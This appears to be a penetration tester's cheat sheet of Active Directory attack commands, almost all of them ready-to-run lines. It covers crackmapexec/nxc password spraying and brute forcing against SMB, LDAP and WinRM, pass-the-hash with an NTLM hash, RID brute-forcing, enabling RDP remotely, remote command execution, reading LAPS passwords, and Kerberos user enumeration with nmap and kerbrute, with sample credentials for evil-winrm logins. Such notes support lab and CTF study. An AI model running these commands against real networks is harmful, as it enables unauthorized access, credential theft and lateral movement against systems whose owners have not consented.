Credentials
SMB
crackmapexec smb targetip (port 135, 139 or 445)
crackmapexec
crackmapexec smb <target_ip> -u <username> -p <password>
crackmapexec smb <target_ip> -u <username> -p <password> --shares
crackmapexec smb 192.168.1.1-100 <range IPs> -u <username> -p <password> --shares
crackmapexec smb <target_ip> -u userslist -p passwordlist --shares
crackmapexec smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
# enable rdp
crackmapexec smb IP -u user -p pass -M rdp -o ACTION=enable
#spider_plus is a carackmapexec module used in the smb section to copy all files paths into a json file
crackmapexec smb <target_ip> -u <username> -p <password> -M spider_plus
#to show content
crackmapexec smb 192.168.1.50 -d wargrey.mon -u Administrator -p h3ckt0r -x “more filepath”
crackmapexec smb 10.10.144.122 -u users -p /usr/share/wordlists/rockyou.txt --continue
LDAP
#Testing if account exist without kerberos protocol
crackmapexec ldap 192.168.1.0/24 -u users.txt -p '' -k
#Testing credentials
crackmapexec ldap 192.168.1.0/24 -u user -p password
crackmapexec ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B
#Identify Trust Relationships And Direction
crackmapexec ldap <ip> -u user -p pass -M enum_trusts
WINRAM or Use nxc
#Identify Trust Relationships And Direction
crackmapexec ldap <ip> -u user -p pass -M enum_trusts
#Password spraying (without brute force)
crackmapexec winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
#Testing credentials
crackmapexec winrm 192.168.1.0/24 -u user -p password
#If the SMB port is closed you can also use the flag -d DOMAIN to avoid an SMB connection
crackmapexec winrm 192.168.1.0/24 -u user -p password -d DOMAIN
#Execute Command using WinRM
crackmapexec winrm 192.168.255.131 -u user -p 'password' -X whoami
#if we meet server 2012 or less, maybe the server has a local administrator with the password you can use --laps refer to local administrator password solution
crackmapexec winrm <ip> -u user-can-read-laps -p pass --laps
nxc winrm 10.10.175.105 -u 'j.rock' -p 'Serviceworks1'
nxc smb 10.10.175.105 -u 'j.rock' -p 'Serviceworks1'
nxc smb 10.10.205.80 -u ' guest' -p '' --rid-brute | grep 'SidTypeUser'
Nmap
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
if we don't join in Domain >> use nslookup
nslookup
nslookup <ip you want> <ip DNS>
#we can use this script to extract data as Like Name (computer name or Client) and (ip)
for /L %i in (1,1,255) do @nslookup 192.168.1.%i <ip DNS> 2>null | find "Name" && echo 192.168.1.%i
enum4linux
enum4linux -a -u "user" -p "password" <DC IP>
./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases
./kerbrute_linux_amd64 -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
smbmap
Find Domain Controller IP
nslookup -type=SRV _ldap._tcp.dc._msdcs.deathstar.rfs
evil-Winrm
evil-winrm -u j.rock@services.local -p Serviceworks1 --ip 10.10.175.105
Last updated